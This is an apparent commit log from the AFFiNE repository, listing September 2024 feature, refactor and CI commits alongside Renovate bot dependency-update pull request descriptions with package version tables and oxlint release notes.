<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguNTYuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-03 09:37:39 +00:00
darkskygit
41f9149be6
feat(server): support openai compatible stream api ( #8065 )
...
fix #8010
2024-09-03 09:25:00 +00:00
darkskygit
935771c8a8
feat(server): make captcha modular ( #5961 )
2024-09-03 09:03:51 +00:00
forehalo
52c9da67f0
refactor(auth): authenticate user in main window ( #8032 )
2024-09-03 09:03:47 +00:00
forehalo
e33aa35f7e
refactor(core): auth ( #7999 )
...
closes AF-753 AF-1227
2024-09-03 09:03:43 +00:00
forehalo
8b0afd6eeb
refactor(server): auth ( #7994 )
2024-09-03 09:03:39 +00:00
Brooooooklyn
821de0a3bb
ci: only expose mobile entry on canary ( #8064 )
2024-09-03 08:48:34 +00:00
SOUMITRA-SAHA
bc306faa2c
fix(core): handle text overflow styles for search box ( #8054 )
2024-09-03 16:47:29 +08:00
renovate
bd8c844e75
chore: bump up figma-squircle version to v1 ( #8047 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [figma-squircle](https://redirect.github.com/phamfoo/figma-squircle ) | [`^0.3.1` -> `^1.0.0`](https://renovatebot.com/diffs/npm/figma-squircle/0.3.1/1.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>phamfoo/figma-squircle (figma-squircle)</summary>
### [`v1.0.0`](https://redirect.github.com/phamfoo/figma-squircle/releases/tag/v1.0.0 )
[Compare Source](https://redirect.github.com/phamfoo/figma-squircle/compare/v0.3.1...v1.0.0 )
- Target es2022 [`700c8f2`](https://redirect.github.com/phamfoo/figma-squircle/commit/700c8f2 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-03 08:28:03 +00:00
renovate
abbc6aef09
chore: bump up oxlint version to v0.9.2 ( #8050 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.9.1` -> `0.9.2`](https://renovatebot.com/diffs/npm/oxlint/0.9.1/0.9.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.9.2`](https://redirect.github.com/oxc-project/oxc/releases/tag/oxlint_v0.9.2 ): oxlint v0.9.2
[Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v0.9.1...oxlint_v0.9.2 )
#### \[0.9.2] - 2024-09-02
##### Features
- [`f81e8a1`](https://redirect.github.com/oxc-project/oxc/commit/f81e8a1 ) linter: Add `oxc/no-async-endpoint-handlers` ([#​5364](https://redirect.github.com/oxc-project/oxc/issues/5364 )) (DonIsaac)
- [`b103737`](https://redirect.github.com/oxc-project/oxc/commit/b103737 ) linter: Improve no-accumulating-spread ([#​5302](https://redirect.github.com/oxc-project/oxc/issues/5302 )) (camc314)
- [`9c22ce9`](https://redirect.github.com/oxc-project/oxc/commit/9c22ce9 ) linter: Add hyperlinks to diagnostic messages ([#​5318](https://redirect.github.com/oxc-project/oxc/issues/5318 )) (DonIsaac)
- [`1967c67`](https://redirect.github.com/oxc-project/oxc/commit/1967c67 ) linter/eslint: Implement no-new-func ([#​5360](https://redirect.github.com/oxc-project/oxc/issues/5360 )) (dalaoshu)
- [`b867e5f`](https://redirect.github.com/oxc-project/oxc/commit/b867e5f ) linter/eslint-plugin-promise: Implement catch-or-return ([#​5121](https://redirect.github.com/oxc-project/oxc/issues/5121 )) (Jelle van der Waa)
- [`8d781e7`](https://redirect.github.com/oxc-project/oxc/commit/8d781e7 ) linter/oxc: Differentiate between array/object in `no-accumulating-spread` loop diagnostic ([#​5375](https://redirect.github.com/oxc-project/oxc/issues/5375 )) (camc314)
- [`db55444`](https://redirect.github.com/oxc-project/oxc/commit/db55444 ) linter/oxc: Add fixer for `double-comparisons` ([#​5378](https://redirect.github.com/oxc-project/oxc/issues/5378 )) (camc314)
- [`e5c755a`](https://redirect.github.com/oxc-project/oxc/commit/e5c755a ) linter/promise: Add `spec-only` rule ([#​5124](https://redirect.github.com/oxc-project/oxc/issues/5124 )) (Jelle van der Waa)
- [`4c0861f`](https://redirect.github.com/oxc-project/oxc/commit/4c0861f ) linter/unicorn: Add fixer for `prefer-type-error` ([#​5311](https://redirect.github.com/oxc-project/oxc/issues/5311 )) (camc314)
- [`084c2d1`](https://redirect.github.com/oxc-project/oxc/commit/084c2d1 ) linter/vitest: Implement prefer-to-be-object ([#​5321](https://redirect.github.com/oxc-project/oxc/issues/5321 )) (dalaoshu)
##### Bug Fixes
- [`11b93af`](https://redirect.github.com/oxc-project/oxc/commit/11b93af ) linter/unicorn: Consistent-function-scoping false positive on assignment expression ([#​5312](https://redirect.github.com/oxc-project/oxc/issues/5312 )) (Arian94)
##### Performance
- [`f052a6d`](https://redirect.github.com/oxc-project/oxc/commit/f052a6d ) linter: `react/jsx_no_undef` faster check for unbound references ([#​5349](https://redirect.github.com/oxc-project/oxc/issues/5349 )) (overlookmotel)
- [`05636b7`](https://redirect.github.com/oxc-project/oxc/commit/05636b7 ) linter: Avoid unnecessary work in `jsx_a11y/anchor_is_valid` rule ([#​5341](https://redirect.github.com/oxc-project/oxc/issues/5341 )) (overlookmotel)
##### Refactor
- [`afb038e`](https://redirect.github.com/oxc-project/oxc/commit/afb038e ) linter: `react/jsx_no_undef` use loop instead of recursion ([#​5347](https://redirect.github.com/oxc-project/oxc/issues/5347 )) (overlookmotel)
- [`fe62687`](https://redirect.github.com/oxc-project/oxc/commit/fe62687 ) linter: Simplify skipping JSX elements in `unicorn/consistent_function_scoping` ([#​5351](https://redirect.github.com/oxc-project/oxc/issues/5351 )) (overlookmotel)
- [`381d9fe`](https://redirect.github.com/oxc-project/oxc/commit/381d9fe ) linter: Shorten code in `react/jsx_no_useless_fragment` ([#​5350](https://redirect.github.com/oxc-project/oxc/issues/5350 )) (overlookmotel)
- [`83b9a82`](https://redirect.github.com/oxc-project/oxc/commit/83b9a82 ) linter: Fix indentation in `nextjs/no_script_component_in_head` rule ([#​5338](https://redirect.github.com/oxc-project/oxc/issues/5338 )) (overlookmotel)
- [`89f0188`](https://redirect.github.com/oxc-project/oxc/commit/89f0188 ) linter: Improve docs for `react/jsx_no_target_blank` rule ([#​5342](https://redirect.github.com/oxc-project/oxc/issues/5342 )) (overlookmotel)
- [`57050ab`](https://redirect.github.com/oxc-project/oxc/commit/57050ab ) linter: Shorten code in `jsx_a11y/aria_activedescendant_has_tabindex` rule ([#​5340](https://redirect.github.com/oxc-project/oxc/issues/5340 )) (overlookmotel)
- [`ed31d67`](https://redirect.github.com/oxc-project/oxc/commit/ed31d67 ) linter/jest: Fix indentation in code comment ([#​5372](https://redirect.github.com/oxc-project/oxc/issues/5372 )) (camc314)
- [`2499cb9`](https://redirect.github.com/oxc-project/oxc/commit/2499cb9 ) linter/oxc: Update rule docs for `erasing-op` ([#​5376](https://redirect.github.com/oxc-project/oxc/issues/5376 )) (camc314)
- [`69493d2`](https://redirect.github.com/oxc-project/oxc/commit/69493d2 ) linter/oxc: Improve diagnostic for `no-accumulating-spread` in loops ([#​5374](https://redirect.github.com/oxc-project/oxc/issues/5374 )) (camc314)
- [`024b585`](https://redirect.github.com/oxc-project/oxc/commit/024b585 ) linter/oxc: Improve code comment for `no-accumulating-spread` ([#​5373](https://redirect.github.com/oxc-project/oxc/issues/5373 )) (camc314)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-03 08:11:59 +00:00
renovate
3f324a5af9
chore: bump up @types/eslint version to v9 ( #7570 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@types/eslint](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/eslint ) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/eslint )) | [`^8.56.7` -> `^9.0.0`](https://renovatebot.com/diffs/npm/@types%2feslint/8.56.11/9.6.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MzguMCIsInVwZGF0ZWRJblZlciI6IjM4LjU2LjAiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->
2024-09-03 07:56:25 +00:00
renovate
7b9d9a1ca6
chore: Lock file maintenance ( #7390 )
...
This PR contains the following updates:
| Update | Change |
|---|---|
| lockFileMaintenance | All locks refreshed |
🔧 This Pull Request updates lock files to use the latest dependency versions.
---
### Configuration
📅 **Schedule**: Branch creation - "before 4am on Monday" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MjEuMCIsInVwZGF0ZWRJblZlciI6IjM4LjU5LjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->
2024-09-03 07:42:54 +00:00
Brooooooklyn
12d73ee290
ci: handle the blocksuite commit is not found on current branch ( #8061 )
2024-09-03 07:09:03 +00:00
renovate
d819a26bc1
chore: bump up all non-major dependencies ( #7963 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@chromatic-com/storybook](https://redirect.github.com/chromaui/addon-visual-tests ) | [`1.7.0` -> `1.8.0`](https://renovatebot.com/diffs/npm/@chromatic-com%2fstorybook/1.7.0/1.8.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@commitlint/cli](https://commitlint.js.org/ ) ([source](https://redirect.github.com/conventional-changelog/commitlint/tree/HEAD/@commitlint/cli )) | [`19.4.0` -> `19.4.1`](https://renovatebot.com/diffs/npm/@commitlint%2fcli/19.4.0/19.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@commitlint/config-conventional](https://commitlint.js.org/ ) ([source](https://redirect.github.com/conventional-changelog/commitlint/tree/HEAD/@commitlint/config-conventional )) | [`19.2.2` -> `19.4.1`](https://renovatebot.com/diffs/npm/@commitlint%2fconfig-conventional/19.2.2/19.4.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@marsidev/react-turnstile](https://redirect.github.com/marsidev/react-turnstile ) | [`1.0.0` -> `1.0.1`](https://renovatebot.com/diffs/npm/@marsidev%2freact-turnstile/1.0.0/1.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@napi-rs/simple-git](https://redirect.github.com/Brooooooklyn/simple-git ) | [`0.1.18` -> `0.1.19`](https://renovatebot.com/diffs/npm/@napi-rs%2fsimple-git/0.1.18/0.1.19 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@napi-rs/simple-git](https://redirect.github.com/Brooooooklyn/simple-git ) | [`0.1.18` -> `0.1.19`](https://renovatebot.com/diffs/npm/@napi-rs%2fsimple-git/0.1.18/0.1.19 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@nx/vite](https://nx.dev ) ([source](https://redirect.github.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.6.2` -> `19.6.4`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.6.2/19.6.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@opentelemetry/core](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-core ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`1.25.1` -> `1.26.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fcore/1.25.1/1.26.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`^0.52.0` -> `^0.53.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.52.1/0.53.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`1.25.1` -> `1.26.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/1.25.1/1.26.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`^0.52.0` -> `^0.53.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.52.1/0.53.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/plugins/node/opentelemetry-instrumentation-graphql#readme ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib )) | [`^0.42.0` -> `^0.43.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.42.0/0.43.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`^0.52.0` -> `^0.53.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.52.1/0.53.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/plugins/node/opentelemetry-instrumentation-ioredis#readme ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib )) | [`^0.42.0` -> `^0.43.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.42.0/0.43.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/plugins/node/opentelemetry-instrumentation-nestjs-core#readme ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib )) | [`^0.39.0` -> `^0.40.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.39.0/0.40.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/plugins/node/instrumentation-socket.io#readme ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib )) | [`^0.41.0` -> `^0.42.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.41.0/0.42.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/resources](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-resources ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`1.25.1` -> `1.26.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fresources/1.25.1/1.26.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`1.25.1` -> `1.26.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/1.25.1/1.26.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`^0.52.0` -> `^0.53.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.52.1/0.53.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`1.25.1` -> `1.26.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/1.25.1/1.26.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions ) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js )) | [`1.26.0` -> `1.27.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.26.0/1.27.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@prisma/client](https://www.prisma.io ) ([source](https://redirect.github.com/prisma/prisma/tree/HEAD/packages/client )) | [`5.18.0` -> `5.19.1`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.18.0/5.19.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@prisma/instrumentation](https://www.prisma.io ) ([source](https://redirect.github.com/prisma/prisma/tree/HEAD/packages/instrumentation )) | [`5.18.0` -> `5.19.1`](https://renovatebot.com/diffs/npm/@prisma%2finstrumentation/5.18.0/5.19.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/electron](https://redirect.github.com/getsentry/sentry-electron ) | [`5.3.0` -> `5.4.0`](https://renovatebot.com/diffs/npm/@sentry%2felectron/5.3.0/5.4.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@sentry/esbuild-plugin](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/esbuild-plugin ) ([source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.22.2` -> `2.22.3`](https://renovatebot.com/diffs/npm/@sentry%2fesbuild-plugin/2.22.2/2.22.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@sentry/react](https://redirect.github.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://redirect.github.com/getsentry/sentry-javascript )) | [`8.26.0` -> `8.27.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.26.0/8.27.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/react](https://redirect.github.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://redirect.github.com/getsentry/sentry-javascript )) | [`8.26.0` -> `8.27.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.26.0/8.27.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@sentry/webpack-plugin](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/webpack-plugin ) ([source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.22.2` -> `2.22.3`](https://renovatebot.com/diffs/npm/@sentry%2fwebpack-plugin/2.22.2/2.22.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@swc/core](https://swc.rs ) ([source](https://redirect.github.com/swc-project/swc )) | [`1.7.14` -> `1.7.23`](https://renovatebot.com/diffs/npm/@swc%2fcore/1.7.14/1.7.23 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@tanstack/react-table](https://tanstack.com/table ) ([source](https://redirect.github.com/TanStack/table/tree/HEAD/packages/react-table )) | [`8.20.1` -> `8.20.5`](https://renovatebot.com/diffs/npm/@tanstack%2freact-table/8.20.1/8.20.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@testing-library/react](https://redirect.github.com/testing-library/react-testing-library ) | [`16.0.0` -> `16.0.1`](https://renovatebot.com/diffs/npm/@testing-library%2freact/16.0.0/16.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/eslint](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/eslint ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/eslint )) | [`8.56.11` -> `8.56.12`](https://renovatebot.com/diffs/npm/@types%2feslint/8.56.11/8.56.12 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/mixpanel-browser](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/mixpanel-browser ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/mixpanel-browser )) | [`2.49.1` -> `2.50.0`](https://renovatebot.com/diffs/npm/@types%2fmixpanel-browser/2.49.1/2.50.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
